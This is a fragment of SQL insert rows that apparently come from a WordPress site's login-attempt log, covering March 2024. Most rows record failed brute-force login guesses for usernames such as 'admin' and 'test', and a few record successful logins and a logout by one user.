(10120, 48731, 1709760376.870158, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–<£', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
(10136, 48880, 1709900267.830278, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgŠ–\Z', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),
(10135, 48877, 1709900266.446298, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
(10134, 48869, 1709900220.737769, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*Àú', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
(10133, 48867, 1709878737.594143, 1, 'loginFailInvalidUsername', 'azmedia', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10132, 48863, 1709878724.606115, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÖ²J', 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10131, 48856, 1709878698.958083, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÖ²J', 'Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),
(10130, 48853, 1709864048.654933, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxL÷µ', 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),
(10129, 48839, 1709845807.213439, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36'),
(10145, 48978, 1710013854.565634, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk®BÌ', 'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10144, 48968, 1709988210.208739, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'),
(10143, 48957, 1709988149.215641, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),
(10142, 48947, 1709965621.069907, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''ib', 'Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36'),
(10141, 48939, 1709947343.223933, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ-', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),
(10140, 48930, 1709933760.224239, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36'),
(10139, 48929, 1709933694.290137, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36'),
(10159, 49217, 1710183717.434206, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ"„9', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),
(10153, 49057, 1710095247.475559, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓ•Œ9', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),
(10152, 49057, 1710095247.314068, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓ•Œ9', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),
(10151, 49053, 1710095200.579621, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓ•Œ9', 'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10150, 49021, 1710069056.270792, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–<£', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'),
(10149, 49009, 1710066226.199995, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂü^', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(10148, 49004, 1710066208.533818, 1, 'loginFailInvalidUsername', '123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ@9p', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(10158, 49211, 1710169292.285408, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10157, 49206, 1710169275.757378, 1, 'loginFailInvalidUsername', 'developer', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgv²', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(10156, 49205, 1710169273.275590, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€7', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),
(10155, 49199, 1710146153.853176, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓ•Œ9', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),
(10154, 49190, 1710146128.823064, 1, 'loginFailInvalidUsername', 'test1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŒ…€', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(10164, 49238, 1710219180.020349, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD²„¥', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(10163, 49232, 1710219115.177482, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹«Æ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(10162, 49229, 1710196216.036835, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂü^', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10161, 49227, 1710196197.087138, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂü^', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'),
(10160, 49224, 1710196185.508379, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ/òAÂ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),
(10192, 49556, 1710396447.317261, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ•2„‰', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),
(10191, 49554, 1710396439.206925, 1, 'loginFailInvalidUsername', 'editor', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†¦', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(10190, 49546, 1710387935.442984, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ-', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),
(10189, 49543, 1710387917.426622, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŽÏº', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),
(10188, 49540, 1710387902.381870, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.®Ì', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0'),
(10182, 49433, 1710334875.865710, 1, 'loginFailInvalidUsername', 'pmv.dev.gvt', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ“¶ÊÇ', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10181, 49431, 1710334850.223401, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),
(10180, 49375, 1710310119.777069, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD²’Ã', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(10179, 49371, 1710310107.488758, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(10178, 49368, 1710310102.801497, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c', 'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10177, 49366, 1710310092.228638, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv‹²:', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10176, 49365, 1710310091.613442, 1, 'loginFailInvalidUsername', 'wwwadm', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶Je=', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
(10187, 49539, 1710387901.673848, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°X)Ï', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),
(10186, 49534, 1710387883.721836, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[êÃ€', 'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10185, 49523, 1710362622.052514, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿN‡Zª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),
(10184, 49520, 1710362607.396602, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3S¹£', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(10183, 49518, 1710362601.847036, 1, 'loginFailInvalidUsername', 'nst', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿUì™', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
(10227, 49802, 1710662745.989814, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ON)', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(10226, 49798, 1710662731.744764, 1, 'loginFailInvalidUsername', 'admin2', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃn&¤', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),
(10225, 49797, 1710662730.052217, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿAmd', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(10217, 49768, 1710601137.350215, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-O*S', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10216, 49762, 1710601103.476395, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¤DÄ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),
(10215, 49760, 1710601089.613503, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ„‘•', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'),
(10214, 49742, 1710569968.021285, 1, 'loginFailInvalidUsername', 'replicajp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxL÷µ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10208, 49635, 1710509351.037394, 1, 'loginFailInvalidUsername', 'magico', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ™™', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0'),
(10207, 49604, 1710477534.921698, 1, 'loginFailInvalidUsername', 'quantri', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10206, 49602, 1710477518.020454, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.·Ø…', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10205, 49601, 1710477494.905736, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥#', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),
(10204, 49600, 1710477493.072477, 1, 'loginFailInvalidUsername', 'wpupdateuser', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1'),
(10203, 49598, 1710477486.623644, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-wÔ<', 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10213, 49738, 1710569945.639858, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ(qÌX', 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),
(10212, 49724, 1710540761.757582, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÐIËm', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10211, 49720, 1710540732.593112, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿe"õj', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(10210, 49719, 1710540730.201101, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgJó', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),
(10209, 49718, 1710540726.320310, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿjKFˆ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(10224, 49795, 1710662720.496277, 1, 'loginFailInvalidUsername', 'barlet', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-OyÇ', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),
(10223, 49789, 1710630099.162743, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ>H/¤', 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10222, 49788, 1710630091.435220, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑa‘^', 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),
(10221, 49787, 1710630090.796114, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),
(10220, 49785, 1710630085.869516, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rêA6', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(10219, 49783, 1710630077.734422, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.·Ø…', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),
(10218, 49777, 1710630063.304711, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10235, 49858, 1710767942.778094, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Ç/ô', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10234, 49854, 1710767935.754275, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgb–', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),
(10233, 49849, 1710767919.494675, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.·Ø…', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10232, 49836, 1710742828.278870, 1, 'loginFailInvalidUsername', 'upastra007', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),
(10231, 49823, 1710721975.234696, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),
(10230, 49810, 1710719435.339443, 1, 'loginFailInvalidUsername', 'janani', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´û}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(10229, 49809, 1710719433.704262, 1, 'loginFailInvalidUsername', 'sharafi_iolt', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹Žž', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),
(10228, 49808, 1710719430.383698, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]ºò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),
(10245, 49890, 1710822243.812984, 1, 'loginFailInvalidUsername', 'jannat', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10244, 49889, 1710822243.336870, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),
(10243, 49889, 1710822243.318791, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÆi', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),
(10242, 49887, 1710822224.858945, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¦¨e', 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),
(10241, 49885, 1710822219.134050, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),
(10240, 49883, 1710822198.706669, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD²œ^', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),
(10239, 49875, 1710794658.338687, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÖ²J', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),
(10238, 49870, 1710794595.490293, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿe"õj', 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10273, 50162, 1711025764.764831, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(10272, 50143, 1711011212.577136, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\÷×', 'Mozilla/5.0'),
(10271, 50129, 1711005163.937821, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿª@„ ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(10270, 50096, 1710995406.702494, 1, 'loginFailInvalidUsername', 'GP_Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ™“', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10269, 50095, 1710995406.627976, 1, 'loginFailInvalidUsername', 'Chris', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ™“', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10268, 50094, 1710995377.109930, 1, 'loginFailInvalidUsername', 'Nacht', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓõs', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10267, 50093, 1710995331.396838, 1, 'loginFailInvalidUsername', 'alfons', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸAžM', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10266, 50092, 1710995330.695168, 1, 'loginFailInvalidUsername', 'dev', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸAžM', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10260, 50020, 1710947391.082461, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿNŸcÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),
(10259, 50019, 1710947390.826313, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ÌÖÊ', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10258, 50018, 1710947383.283893, 1, 'loginFailInvalidUsername', 'growthnexus', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€7', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10257, 49994, 1710923429.821668, 1, 'loginFailInvalidUsername', 'cornelis', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾oÑJ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10256, 49964, 1710899731.529867, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙB\\', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10255, 49960, 1710897671.338366, 1, 'loginFailInvalidUsername', 'mepsmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§c>', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
